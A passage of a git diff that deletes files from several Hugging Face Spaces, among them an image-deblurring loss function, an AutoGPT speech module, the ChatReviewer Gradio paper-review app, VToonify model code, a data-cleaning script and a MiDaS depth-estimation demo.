**kwargs): - if latent.shape[1] == 1: - return 0 - else: - X = latent.view(-1, 1, 14, 512) - Y = latent.view(-1, 14, 1, 512) - A = ((X - Y).pow(2).sum(-1) + 1e-9).sqrt() - B = ((X + Y).pow(2).sum(-1) + 1e-9).sqrt() - D = 2 * torch.atan2(A, B) - D = ((D.pow(2) * 512).mean((1, 2)) / 6.0).sum() - return D - - def forward(self, latent, gen_im, kernel, step): - var_dict = { - "latent": latent, - "gen_im_lr": self.D.adaptKernel(gen_im, kernel), - "ref_im": self.ref_im, - } - loss = 0 - loss_fun_dict = { - "L2": self._loss_l2, - "L1": self._loss_l1, - "GEOCROSS": self._loss_geocross, - } - losses = {} - - for weight, loss_type in self.parsed_loss: - tmp_loss = loss_fun_dict[loss_type](**var_dict) - losses[loss_type] = tmp_loss - loss += float(weight) * tmp_loss - loss += 1e-4 * torch.norm(kernel) - losses["Norm"] = torch.norm(kernel) - - return loss, losses - - def get_blur_img(self, sharp_img, kernel): - return self.D.adaptKernel(sharp_img, kernel).cpu().detach().clamp(0, 1) diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/rnrs/lists.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/rnrs/lists.go deleted file mode 100644 index 53c499db4fe5fa929ba045fad76e16e7b0d4058e..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/rnrs/lists.go and /dev/null differ diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/sxml/fold.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/sxml/fold.go deleted file mode 100644 index 140b3302098c40c7ac52770487268c6c507410f9..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/guile/2.2/ccache/sxml/fold.go and /dev/null differ diff --git a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/autochange.go b/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/autochange.go deleted file mode 100644 index 0021ca197157e06caa801783259475d1483f9b4d..0000000000000000000000000000000000000000 Binary files a/spaces/Pattr/DrumClassification/lilypond-2.24.2/lib/lilypond/2.24.2/ccache/lily/autochange.go and /dev/null differ diff --git a/spaces/PeepDaSlan9/AutoGPT/BULLETIN.md b/spaces/PeepDaSlan9/AutoGPT/BULLETIN.md deleted file mode 100644 index 735048ddc87a914987c6bd70ccdb231a80242ae3..0000000000000000000000000000000000000000 --- a/spaces/PeepDaSlan9/AutoGPT/BULLETIN.md +++ /dev/null @@ -1,2 +0,0 @@ -Welcome to Auto-GPT! We'll keep you informed of the latest news and features by printing messages here. -If you don't wish to see this message, you can run Auto-GPT with the --skip-news flag \ No newline at end of file diff --git a/spaces/PeepDaSlan9/AutoGPT/autogpt/speech/brian.py b/spaces/PeepDaSlan9/AutoGPT/autogpt/speech/brian.py deleted file mode 100644 index 821fdf2f482a9cfa928e5c9680152ad6766d8326..0000000000000000000000000000000000000000 --- a/spaces/PeepDaSlan9/AutoGPT/autogpt/speech/brian.py +++ /dev/null @@ -1,40 +0,0 @@ -""" Brian speech module for autogpt """ -import os - -import requests -from playsound import playsound - -from autogpt.speech.base import VoiceBase - - -class BrianSpeech(VoiceBase): - """Brian speech module for autogpt""" - - def _setup(self) -> None: - """Setup the voices, API key, etc.""" - pass - - def _speech(self, text: str, _: int = 0) -> bool: - """Speak text using Brian with the streamelements API - - Args: - text (str): The text to speak - - Returns: - bool: True if the request was successful, False otherwise - """ - tts_url = ( - f"https://api.streamelements.com/kappa/v2/speech?voice=Brian&text={text}" - ) - response = requests.get(tts_url) - - if response.status_code == 200: - with open("speech.mp3", "wb") as f: - f.write(response.content) - playsound("speech.mp3") - os.remove("speech.mp3") - return True - else: - print("Request failed with status code:", response.status_code) - print("Response content:", response.content) - return False diff --git a/spaces/QuanLingZ/ChatReviewer/app.py b/spaces/QuanLingZ/ChatReviewer/app.py deleted file mode 100644 index 083a1fa40a17e4950c79a5c0934f3d74036eb445..0000000000000000000000000000000000000000 --- a/spaces/QuanLingZ/ChatReviewer/app.py +++ /dev/null @@ -1,218 +0,0 @@ -import numpy as np -import os -import re -import jieba -from io import BytesIO -import datetime -import time -import openai, tenacity -import argparse -import configparser -import json -import tiktoken -import PyPDF2 -import gradio - - -def contains_chinese(text): - for ch in text: - if u'\u4e00' <= ch <= u'\u9fff': - return True - return False - -def insert_sentence(text, sentence, interval): - lines = text.split('\n') - new_lines = [] - - for line in lines: - if contains_chinese(line): - words = list(jieba.cut(line)) - separator = '' - else: - words = line.split() - separator = ' ' - - new_words = [] - count = 0 - - for word in words: - new_words.append(word) - count += 1 - - if count % interval == 0: - new_words.append(sentence) - - new_lines.append(separator.join(new_words)) - - return '\n'.join(new_lines) - -# 定义Reviewer类 -class Reviewer: - # 初始化方法,设置属性 - def __init__(self, api, review_format, paper_pdf, language): - self.api = api - self.review_format = review_format - - self.language = language - self.paper_pdf = paper_pdf - self.max_token_num = 12000 - self.encoding = tiktoken.get_encoding("gpt2") - - - def review_by_chatgpt(self, paper_list): - text = self.extract_chapter(self.paper_pdf) - chat_review_text, total_token_used = self.chat_review(text=text) - return chat_review_text, total_token_used - - - - @tenacity.retry(wait=tenacity.wait_exponential(multiplier=1, min=4, max=10), - stop=tenacity.stop_after_attempt(5), - reraise=True) - def chat_review(self, text): - openai.api_key = self.api # 读取api - review_prompt_token = 1000 - try: - text_token = len(self.encoding.encode(text)) - except: - text_token = 13000 - input_text_index = int(len(text)*(self.max_token_num-review_prompt_token)/(text_token+1)) - input_text = "This is the paper for your review:" + text[:input_text_index] - messages=[ - {"role": "system", "content": "You are a professional reviewer. Now I will give you a paper. You need to give a complete review opinion according to the following requirements and format:"+ self.review_format + "Be sure to use {} answers".format(self.language)} , - {"role": "user", "content": input_text + " Translate the output into {}.".format(self.language)}, - ] - try: - response = openai.ChatCompletion.create( - model="gpt-3.5-turbo-16k", - messages=messages, - temperature=0.7 - ) - result = '' - for choice in response.choices: - result += choice.message.content - result = insert_sentence(result, '**Generated by ChatGPT, no copying allowed!**', 50) - result += "\n\n⚠伦理声明/Ethics statement:\n--禁止直接复制生成的评论用于任何论文审稿工作!\n--Direct copying of generated comments for any paper review work is prohibited!" - usage = response.usage.total_tokens - except Exception as e: - # 处理其他的异常 - result = "⚠:非常抱歉>_<,生了一个错误:"+ str(e) - usage = 'xxxxx' - print("********"*10) - print(result) - print("********"*10) - return result, usage - - - - - - def extract_chapter(self, pdf_path): - file_object = BytesIO(pdf_path) - pdf_reader = PyPDF2.PdfReader(file_object) - # 获取PDF的总页数 - num_pages = len(pdf_reader.pages) - # 初始化提取状态和提取文本 - extraction_started = False - extracted_text = "" - # 遍历PDF中的每一页 - for page_number in range(num_pages): - page = pdf_reader.pages[page_number] - page_text = page.extract_text() - - # 开始提取 - extraction_started = True - page_number_start = page_number - # 如果提取已开始,将页面文本添加到提取文本中 - if extraction_started: - extracted_text += page_text - # 停止提取 - if page_number_start + 1 < page_number: - break - return extracted_text - -def main(api, review_format, paper_pdf, language): - start_time = time.time() - comments = '' - output2 = '' - if not api or not review_format or not paper_pdf: - comments = "⚠:API-key或审稿要求或论文pdf未输入!请检测!" - output2 = "⚠:API-key或审稿要求或论文pdf未输入!请检测!" - # 判断PDF文件 - else: - # 创建一个Reader对象 - reviewer1 = Reviewer(api, review_format, paper_pdf, language) - # 开始判断是路径还是文件: - comments, total_token_used = reviewer1.review_by_chatgpt(paper_list=paper_pdf) - time_used = time.time() - start_time - output2 ="使用token数:"+ str(total_token_used)+"\n花费时间:"+ str(round(time_used, 2)) +"秒" - return comments, output2 - - - -######################################################################################################## -# 标题 -title = "🤖ChatReviewer🤖" -# 描述 - -description = '''
    - -ChatReviewer是一款基于ChatGPT-3.5的API开发的智能论文分析与建议助手。其用途如下: - -⭐️对论文的优缺点进行快速总结和分析,提高科研人员的文献阅读和理解的效率,紧跟研究前沿。 - -⭐️对自己的论文进行分析,根据ChatReviewer生成的改进建议进行查漏补缺,进一步提高自己的论文质量。 - -如果觉得很卡,可以点击右上角的Duplicate this Space,把ChatReviewer复制到你自己的Space中!(🈲:禁止直接复制生成的评论用于任何论文审稿工作!) - -本项目的[Github](https://github.com/nishiwen1214/ChatReviewer),欢迎Star和Fork,也欢迎大佬赞助让本项目快速成长!💗 - - - -
    -''' - -# 创建Gradio界面 -inp = [gradio.inputs.Textbox(label="请输入你的API-key(sk开头的字符串)", - default="", - type='password'), - gradio.inputs.Textbox(lines=5, - label="请输入特定的分析要求和格式(否则为默认格式)", - default="""* Overall Review -Please briefly summarize the main points and contributions of this paper. -xxx -* Paper Strength -Please provide a list of the strengths of this paper, including but not limited to: innovative and practical methodology, insightful empirical findings or in-depth theoretical analysis, -well-structured review of relevant literature, and any other factors that may make the paper valuable to readers. (Maximum length: 2,000 characters) -(1) xxx -(2) xxx -(3) xxx -* Paper Weakness -Please provide a numbered list of your main concerns regarding this paper (so authors could respond to the concerns individually). -These may include, but are not limited to: inadequate implementation details for reproducing the study, limited evaluation and ablation studies for the proposed method, -correctness of the theoretical analysis or experimental results, lack of comparisons or discussions with widely-known baselines in the field, lack of clarity in exposition, -or any other factors that may impede the reader's understanding or benefit from the paper. Please kindly refrain from providing a general assessment of the paper's novelty without providing detailed explanations. (Maximum length: 2,000 characters) -(1) xxx -(2) xxx -(3) xxx -* Questions To Authors And Suggestions For Rebuttal -Please provide a numbered list of specific and clear questions that pertain to the details of the proposed method, evaluation setting, or additional results that would aid in supporting the authors' claims. -The questions should be formulated in a manner that, after the authors have answered them during the rebuttal, it would enable a more thorough assessment of the paper's quality. (Maximum length: 2,000 characters) -*Overall score (1-10) -The paper is scored on a scale of 1-10, with 10 being the full mark, and 6 stands for borderline accept. Then give the reason for your rating. -xxx""" - ), - gradio.inputs.File(label="请上传论文PDF文件(请务必等pdf上传完成后再点击Submit!)",type="bytes"), - gradio.inputs.Radio(choices=["English", "Chinese", "French", "German","Japenese"], - default="English", - label="选择输出语言"), -] - -chat_reviewer_gui = gradio.Interface(fn=main, - inputs=inp, - outputs = [gradio.Textbox(lines=25, label="分析结果"), gradio.Textbox(lines=2, label="资源统计")], - title=title, - description=description) - -# Start server -chat_reviewer_gui .launch(quiet=True, show_api=False) \ No newline at end of file diff --git a/spaces/RMXK/RVC_HFF/infer/lib/uvr5_pack/lib_v5/model_param_init.py b/spaces/RMXK/RVC_HFF/infer/lib/uvr5_pack/lib_v5/model_param_init.py deleted file mode 100644 index b995c0bfb1194746187692e2ab1c2a6dbaaaec6c..0000000000000000000000000000000000000000 --- a/spaces/RMXK/RVC_HFF/infer/lib/uvr5_pack/lib_v5/model_param_init.py +++ /dev/null @@ -1,69 +0,0 @@ -import json -import os -import pathlib - -default_param = {} -default_param["bins"] = 768 -default_param["unstable_bins"] = 9 # training only -default_param["reduction_bins"] = 762 # training only -default_param["sr"] = 44100 -default_param["pre_filter_start"] = 757 -default_param["pre_filter_stop"] = 768 -default_param["band"] = {} - - -default_param["band"][1] = { - "sr": 11025, - "hl": 128, - "n_fft": 960, - "crop_start": 0, - "crop_stop": 245, - "lpf_start": 61, # inference only - "res_type": "polyphase", -} - -default_param["band"][2] = { - "sr": 44100, - "hl": 512, - "n_fft": 1536, - "crop_start": 24, - "crop_stop": 547, - "hpf_start": 81, # inference only - "res_type": "sinc_best", -} - - -def int_keys(d): - r = {} - for k, v in d: - if k.isdigit(): - k = int(k) - r[k] = v - return r - - -class ModelParameters(object): - def __init__(self, config_path=""): - if ".pth" == pathlib.Path(config_path).suffix: - import zipfile - - with zipfile.ZipFile(config_path, "r") as zip: - self.param = json.loads( - zip.read("param.json"), object_pairs_hook=int_keys - ) - elif ".json" == pathlib.Path(config_path).suffix: - with open(config_path, "r") as f: - self.param = json.loads(f.read(), object_pairs_hook=int_keys) - else: - self.param = default_param - - for k in [ - "mid_side", - "mid_side_b", - "mid_side_b2", - "stereo_w", - "stereo_n", - "reverse", - ]: - if not k in self.param: - self.param[k] = False diff --git a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/compat.py b/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/compat.py deleted file mode 100644 index 9ab2bb48656520a95ec9ac87d090f2e741f0e544..0000000000000000000000000000000000000000 --- a/spaces/Raspberry-ai/main/.env/lib/python3.11/site-packages/pip/_vendor/requests/compat.py +++ /dev/null @@ -1,67 +0,0 @@ -""" -requests.compat -~~~~~~~~~~~~~~~ - -This module previously handled import compatibility issues -between Python 2 and Python 3. It remains for backwards -compatibility until the next major version. -""" - -from pip._vendor import chardet - -import sys - -# ------- -# Pythons -# ------- - -# Syntax sugar. -_ver = sys.version_info - -#: Python 2.x? -is_py2 = _ver[0] == 2 - -#: Python 3.x? -is_py3 = _ver[0] == 3 - -# Note: We've patched out simplejson support in pip because it prevents -# upgrading simplejson on Windows. -import json -from json import JSONDecodeError - -# Keep OrderedDict for backwards compatibility. -from collections import OrderedDict -from collections.abc import Callable, Mapping, MutableMapping -from http import cookiejar as cookielib -from http.cookies import Morsel -from io import StringIO - -# -------------- -# Legacy Imports -# -------------- -from urllib.parse import ( - quote, - quote_plus, - unquote, - unquote_plus, - urldefrag, - urlencode, - urljoin, - urlparse, - urlsplit, - urlunparse, -) -from urllib.request import ( - getproxies, - getproxies_environment, - parse_http_list, - proxy_bypass, - proxy_bypass_environment, -) - -builtin_str = str -str = str -bytes = bytes -basestring = (str, bytes) -numeric_types = (int, float) -integer_types = (int,) diff --git a/spaces/Reha2704/VToonify/vtoonify/model/vtoonify.py b/spaces/Reha2704/VToonify/vtoonify/model/vtoonify.py deleted file mode 100644 index 6556a0a6c734be5f413f4683eb63c44f449c6af8..0000000000000000000000000000000000000000 --- a/spaces/Reha2704/VToonify/vtoonify/model/vtoonify.py +++ /dev/null @@ -1,286 +0,0 @@ -import torch -import numpy as np -import math -from torch import nn -from model.stylegan.model import ConvLayer, EqualLinear, Generator, ResBlock -from model.dualstylegan import AdaptiveInstanceNorm, AdaResBlock, DualStyleGAN -import torch.nn.functional as F - -# IC-GAN: stylegan discriminator -class ConditionalDiscriminator(nn.Module): - def __init__(self, size, channel_multiplier=2, blur_kernel=[1, 3, 3, 1], use_condition=False, style_num=None): - super().__init__() - - channels = { - 4: 512, - 8: 512, - 16: 512, - 32: 512, - 64: 256 * channel_multiplier, - 128: 128 * channel_multiplier, - 256: 64 * channel_multiplier, - 512: 32 * channel_multiplier, - 1024: 16 * channel_multiplier, - } - - convs = [ConvLayer(3, channels[size], 1)] - - log_size = int(math.log(size, 2)) - - in_channel = channels[size] - - for i in range(log_size, 2, -1): - out_channel = channels[2 ** (i - 1)] - - convs.append(ResBlock(in_channel, out_channel, blur_kernel)) - - in_channel = out_channel - - self.convs = nn.Sequential(*convs) - - self.stddev_group = 4 - self.stddev_feat = 1 - self.use_condition = use_condition - - if self.use_condition: - self.condition_dim = 128 - # map style degree to 64-dimensional vector - self.label_mapper = nn.Sequential( - nn.Linear(1, 64), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Linear(64, 64), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Linear(64, self.condition_dim//2), - ) - # map style code index to 64-dimensional vector - self.style_mapper = nn.Embedding(style_num, self.condition_dim-self.condition_dim//2) - else: - self.condition_dim = 1 - - self.final_conv = ConvLayer(in_channel + 1, channels[4], 3) - self.final_linear = nn.Sequential( - EqualLinear(channels[4] * 4 * 4, channels[4], activation="fused_lrelu"), - EqualLinear(channels[4], self.condition_dim), - ) - - def forward(self, input, degree_label=None, style_ind=None): - out = self.convs(input) - - batch, channel, height, width = out.shape - group = min(batch, self.stddev_group) - stddev = out.view( - group, -1, self.stddev_feat, channel // self.stddev_feat, height, width - ) - stddev = torch.sqrt(stddev.var(0, unbiased=False) + 1e-8) - stddev = stddev.mean([2, 3, 4], keepdims=True).squeeze(2) - stddev = stddev.repeat(group, 1, height, width) - out = torch.cat([out, stddev], 1) - - out = self.final_conv(out) - out = out.view(batch, -1) - - if self.use_condition: - h = self.final_linear(out) - condition = torch.cat((self.label_mapper(degree_label), self.style_mapper(style_ind)), dim=1) - out = (h * condition).sum(dim=1, keepdim=True) * (1 / np.sqrt(self.condition_dim)) - else: - out = self.final_linear(out) - - return out - - -class VToonifyResBlock(nn.Module): - def __init__(self, fin): - super().__init__() - - self.conv = nn.Conv2d(fin, fin, 3, 1, 1) - self.conv2 = nn.Conv2d(fin, fin, 3, 1, 1) - self.lrelu = nn.LeakyReLU(negative_slope=0.2, inplace=True) - - def forward(self, x): - out = self.lrelu(self.conv(x)) - out = self.lrelu(self.conv2(out)) - out = (out + x) / math.sqrt(2) - return out - -class Fusion(nn.Module): - def __init__(self, in_channels, skip_channels, out_channels): - super().__init__() - - # create conv layers - self.conv = nn.Conv2d(in_channels + skip_channels, out_channels, 3, 1, 1, bias=True) - self.norm = AdaptiveInstanceNorm(in_channels + skip_channels, 128) - self.conv2 = nn.Conv2d(in_channels + skip_channels, 1, 3, 1, 1, bias=True) - #''' - self.linear = nn.Sequential( - nn.Linear(1, 64), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Linear(64, 128), - nn.LeakyReLU(negative_slope=0.2, inplace=True) - ) - - def forward(self, f_G, f_E, d_s=1): - # label of style degree - label = self.linear(torch.zeros(f_G.size(0),1).to(f_G.device) + d_s) - out = torch.cat([f_G, abs(f_G-f_E)], dim=1) - m_E = (F.relu(self.conv2(self.norm(out, label)))).tanh() - f_out = self.conv(torch.cat([f_G, f_E * m_E], dim=1)) - return f_out, m_E - -class VToonify(nn.Module): - def __init__(self, - in_size=256, - out_size=1024, - img_channels=3, - style_channels=512, - num_mlps=8, - channel_multiplier=2, - num_res_layers=6, - backbone = 'dualstylegan', - ): - - super().__init__() - - self.backbone = backbone - if self.backbone == 'dualstylegan': - # DualStyleGAN, with weights being fixed - self.generator = DualStyleGAN(out_size, style_channels, num_mlps, channel_multiplier) - else: - # StyleGANv2, with weights being fixed - self.generator = Generator(out_size, style_channels, num_mlps, channel_multiplier) - - self.in_size = in_size - self.style_channels = style_channels - channels = self.generator.channels - - # encoder - num_styles = int(np.log2(out_size)) * 2 - 2 - encoder_res = [2**i for i in range(int(np.log2(in_size)), 4, -1)] - self.encoder = nn.ModuleList() - self.encoder.append( - nn.Sequential( - nn.Conv2d(img_channels+19, 32, 3, 1, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Conv2d(32, channels[in_size], 3, 1, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True))) - - for res in encoder_res: - in_channels = channels[res] - if res > 32: - out_channels = channels[res // 2] - block = nn.Sequential( - nn.Conv2d(in_channels, out_channels, 3, 2, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True), - nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=True), - nn.LeakyReLU(negative_slope=0.2, inplace=True)) - self.encoder.append(block) - else: - layers = [] - for _ in range(num_res_layers): - layers.append(VToonifyResBlock(in_channels)) - self.encoder.append(nn.Sequential(*layers)) - block = nn.Conv2d(in_channels, img_channels, 1, 1, 0, bias=True) - self.encoder.append(block) - - # trainable fusion module - self.fusion_out = nn.ModuleList() - self.fusion_skip = nn.ModuleList() - for res in encoder_res[::-1]: - num_channels = channels[res] - if self.backbone == 'dualstylegan': - self.fusion_out.append( - Fusion(num_channels, num_channels, num_channels)) - else: - self.fusion_out.append( - nn.Conv2d(num_channels * 2, num_channels, 3, 1, 1, bias=True)) - - self.fusion_skip.append( - nn.Conv2d(num_channels + 3, 3, 3, 1, 1, bias=True)) - - # Modified ModRes blocks in DualStyleGAN, with weights being fixed - if self.backbone == 'dualstylegan': - self.res = nn.ModuleList() - self.res.append(AdaResBlock(self.generator.channels[2 ** 2])) # for conv1, no use in this model - for i in range(3, 6): - out_channel = self.generator.channels[2 ** i] - self.res.append(AdaResBlock(out_channel, dilation=2**(5-i))) - self.res.append(AdaResBlock(out_channel, dilation=2**(5-i))) - - - def forward(self, x, style, d_s=None, return_mask=False, return_feat=False): - # map style to W+ space - if style is not None and style.ndim < 3: - if self.backbone == 'dualstylegan': - resstyles = self.generator.style(style).unsqueeze(1).repeat(1, self.generator.n_latent, 1) - adastyles = style.unsqueeze(1).repeat(1, self.generator.n_latent, 1) - elif style is not None: - nB, nL, nD = style.shape - if self.backbone == 'dualstylegan': - resstyles = self.generator.style(style.reshape(nB*nL, nD)).reshape(nB, nL, nD) - adastyles = style - if self.backbone == 'dualstylegan': - adastyles = adastyles.clone() - for i in range(7, self.generator.n_latent): - adastyles[:, i] = self.generator.res[i](adastyles[:, i]) - - # obtain multi-scale content features - feat = x - encoder_features = [] - # downsampling conv parts of E - for block in self.encoder[:-2]: - feat = block(feat) - encoder_features.append(feat) - encoder_features = encoder_features[::-1] - # Resblocks in E - for ii, block in enumerate(self.encoder[-2]): - feat = block(feat) - # adjust Resblocks with ModRes blocks - if self.backbone == 'dualstylegan': - feat = self.res[ii+1](feat, resstyles[:, ii+1], d_s) - # the last-layer feature of E (inputs of backbone) - out = feat - skip = self.encoder[-1](feat) - if return_feat: - return out, skip - - # 32x32 ---> higher res - _index = 1 - m_Es = [] - for conv1, conv2, to_rgb in zip( - self.stylegan().convs[6::2], self.stylegan().convs[7::2], self.stylegan().to_rgbs[3:]): - - # pass the mid-layer features of E to the corresponding resolution layers of G - if 2 ** (5+((_index-1)//2)) <= self.in_size: - fusion_index = (_index - 1) // 2 - f_E = encoder_features[fusion_index] - - if self.backbone == 'dualstylegan': - out, m_E = self.fusion_out[fusion_index](out, f_E, d_s) - skip = self.fusion_skip[fusion_index](torch.cat([skip, f_E*m_E], dim=1)) - m_Es += [m_E] - else: - out = self.fusion_out[fusion_index](torch.cat([out, f_E], dim=1)) - skip = self.fusion_skip[fusion_index](torch.cat([skip, f_E], dim=1)) - - # remove the noise input - batch, _, height, width = out.shape - noise = x.new_empty(batch, 1, height * 2, width * 2).normal_().detach() * 0.0 - - out = conv1(out, adastyles[:, _index+6], noise=noise) - out = conv2(out, adastyles[:, _index+7], noise=noise) - skip = to_rgb(out, adastyles[:, _index+8], skip) - _index += 2 - - image = skip - if return_mask and self.backbone == 'dualstylegan': - return image, m_Es - return image - - def stylegan(self): - if self.backbone == 'dualstylegan': - return self.generator.generator - else: - return self.generator - - def zplus2wplus(self, zplus): - return self.stylegan().style(zplus.reshape(zplus.shape[0]*zplus.shape[1], zplus.shape[2])).reshape(zplus.shape) \ No newline at end of file diff --git a/spaces/SERER/VITS-Umamusume-voice-synthesizer/text/__init__.py b/spaces/SERER/VITS-Umamusume-voice-synthesizer/text/__init__.py deleted file mode 100644 index 4e69c354dd24e3243980236eca962cd5945a92fc..0000000000000000000000000000000000000000 --- a/spaces/SERER/VITS-Umamusume-voice-synthesizer/text/__init__.py +++ /dev/null @@ -1,32 +0,0 @@ -""" from https://github.com/keithito/tacotron """ -from text import cleaners - - -def text_to_sequence(text, symbols, cleaner_names): - '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. - Args: - text: string to convert to a sequence - cleaner_names: names of the cleaner functions to run the text through - Returns: - List of integers corresponding to the symbols in the text - ''' - _symbol_to_id = {s: i for i, s in enumerate(symbols)} - - sequence = [] - - clean_text = _clean_text(text, cleaner_names) - for symbol in clean_text: - if symbol not in _symbol_to_id.keys(): - continue - symbol_id = _symbol_to_id[symbol] - sequence += [symbol_id] - return sequence - - -def _clean_text(text, cleaner_names): - for name in cleaner_names: - cleaner = getattr(cleaners, name) - if not cleaner: - raise Exception('Unknown cleaner: %s' % name) - text = cleaner(text) - return text diff --git a/spaces/SHSH0819/event_detection_app/event_detection_dataclean.py b/spaces/SHSH0819/event_detection_app/event_detection_dataclean.py deleted file mode 100644 index 70012498b4d11848e472dbacf17063379dbd7782..0000000000000000000000000000000000000000 --- a/spaces/SHSH0819/event_detection_app/event_detection_dataclean.py +++ /dev/null @@ -1,118 +0,0 @@ -import re -import json -from collections import Counter - - -def load_texttag_file(texttag_filename): - try: - with open(texttag_filename, "r") as data_file: - data_all = data_file.read() - tags_all = list() - texts_selected = list() - tags_selected = list() - - for line in re.split(r'\n\t?\n', data_all): - if len(line) != 0: - texts_line = list() - tags_line = list() - for item in line.split("\n"): - if len(item)!=0: - text, tag = item.split("\t") - if re.search(r"[@|?|!+?|:|(|)]|\\|\.*?\|-|/|/|/.*?/|http\S+|www\S+", text) == None: - texts_line.append(text.lower()) - tags_line.append(tag) - tags_all.append(tag) - - texts_selected.append(texts_line) - tags_selected.append(tags_line) - except FileNotFoundError as error: - msg = "Sorry, the file" + data_file + "does not exist." - print(msg) - print("error:" + error) - - return texts_selected, tags_selected, tags_all - - -def tag_ids_map(tags_all, tags2ids_name, ids2tags_name): - tags = list(set(tags_all)) - tags.sort() - unique_tags = len(tags) - ids = [i for i in range(unique_tags)] - - tags2ids = dict(zip(tags, ids)) - ids2tags = dict(zip(ids, tags)) - - with open(tags2ids_name, "w") as filename: - json.dump(tags2ids, filename) - - with open(ids2tags_name, "w") as filename: - json.dump(ids2tags, filename) - - return tags2ids, ids2tags - - -def add_tagids(tags_selected, tags2ids, ids2tags): - tagids_selected = list() - for tags_line in tags_selected: - tagids_line = list() - for tag in tags_line: - tagids_line.append(tags2ids[tag]) - tagids_selected.append(tagids_line) - # print(tagids_selected) - return tagids_selected - - -def add_text_tagid(tags_selected, tags2ids, ids2tags): - tags_chunk = list() - tagids_chunk = list() - for tags_line in tags_selected: - tag_line_chunk = list() - tagid_line_chunk = list() - tag_line_count = Counter(tags_line) - if len(tag_line_count) == 1: - tag_line_chunk.append(max(tag_line_count)) - tagid_line_chunk.append(tags2ids[max(tag_line_count)]) - else: - del tag_line_count["O"] - tag_line_chunk.append(max(tag_line_count)) - tagid_line_chunk.append(tags2ids[max(tag_line_count)]) - - tags_chunk.append(tag_line_chunk) - tagids_chunk.append(tagid_line_chunk) - - return tags_chunk, tagids_chunk - -def save_json(json_filename, texts_selected, tags_selected, tagids_selected, tags_chunk, tagids_chunk): - total_length = len(texts_selected) - save_datalist = list() - total_length = 32 - for index in range(total_length): - item_dict = dict() - item_dict["text"] = texts_selected[index] - item_dict["word_tag"] = tags_selected[index] - item_dict["word_tag_id"] = tagids_selected[index] - item_dict["text_tag"] = tags_chunk[index] - item_dict["text_tag_id"] = tagids_chunk[index] - save_datalist.append(item_dict) - - with open(json_filename, 'w') as file: - json.dump(save_datalist, file) - - return - -def main(data_filename, json_filename, tags2ids_name, ids2tags_name): - texts_selected, tags_selected, tags_all = load_texttag_file(data_filename) - tags2ids, ids2tags = tag_ids_map(tags_all, tags2ids_name, ids2tags_name) - - tagids_selected = add_tagids(tags_selected, tags2ids, ids2tags) - tags_chunk, tagids_chunk = add_text_tagid(tags_selected, tags2ids, ids2tags) - - save_json(json_filename, texts_selected, tags_selected, tagids_selected, tags_chunk, tagids_chunk) - - -if __name__ == "__main__": - test_raw = "../data/raw_EDT/Event_detection/dev.txt" - test_save = '../data/raw_EDT/Event_detection/dev.json' - tags2ids_name = "../data/raw_EDT/Event_detection/tags2ids.json" - ids2tags_name = "../data/raw_EDT/Event_detection/ids2tags.json" - main(test_raw, test_save, tags2ids_name, ids2tags_name) \ No newline at end of file diff --git a/spaces/SHULGIN/MiDaS/app.py b/spaces/SHULGIN/MiDaS/app.py deleted file mode 100644 index f113fabac69b22df63691569fefdb7e2f29c0849..0000000000000000000000000000000000000000 --- a/spaces/SHULGIN/MiDaS/app.py +++ /dev/null @@ -1,63 +0,0 @@ -import cv2 -import torch -import gradio as gr -import numpy as np -from PIL import Image - -torch.hub.download_url_to_file('https://images.unsplash.com/photo-1437622368342-7a3d73a34c8f', 'turtle.jpg') -torch.hub.download_url_to_file('https://images.unsplash.com/photo-1519066629447-267fffa62d4b', 'lions.jpg') - -midas = torch.hub.load("intel-isl/MiDaS", "MiDaS") - -use_large_model = True - -if use_large_model: - midas = torch.hub.load("intel-isl/MiDaS", "MiDaS") -else: - midas = torch.hub.load("intel-isl/MiDaS", "MiDaS_small") - -device = "cpu" -midas.to(device) - -midas_transforms = torch.hub.load("intel-isl/MiDaS", "transforms") - -if use_large_model: - transform = midas_transforms.default_transform -else: - transform = midas_transforms.small_transform - - -def depth(img): - cv_image = np.array(img) - img = cv2.cvtColor(cv_image, cv2.COLOR_BGR2RGB) - - input_batch = transform(img).to(device) - with torch.no_grad(): - prediction = midas(input_batch) - - prediction = torch.nn.functional.interpolate( - prediction.unsqueeze(1), - size=img.shape[:2], - mode="bicubic", - align_corners=False, - ).squeeze() - - output = prediction.cpu().numpy() - formatted = (output * 255 / np.max(output)).astype('uint8') - img = Image.fromarray(formatted) - return img - - -inputs = gr.inputs.Image(type='pil', label="Original Image") -outputs = gr.outputs.Image(type="pil",label="Output Image") - -title = "MiDaS" -description = "Gradio demo for MiDaS v2.1 which takes in a single image for computing relative depth. To use it, simply upload your image, or click one of the examples to load them. Read more at the links below." -article = "

    Towards Robust Monocular Depth Estimation: Mixing Datasets for Zero-shot Cross-dataset Transfer | Github Repo

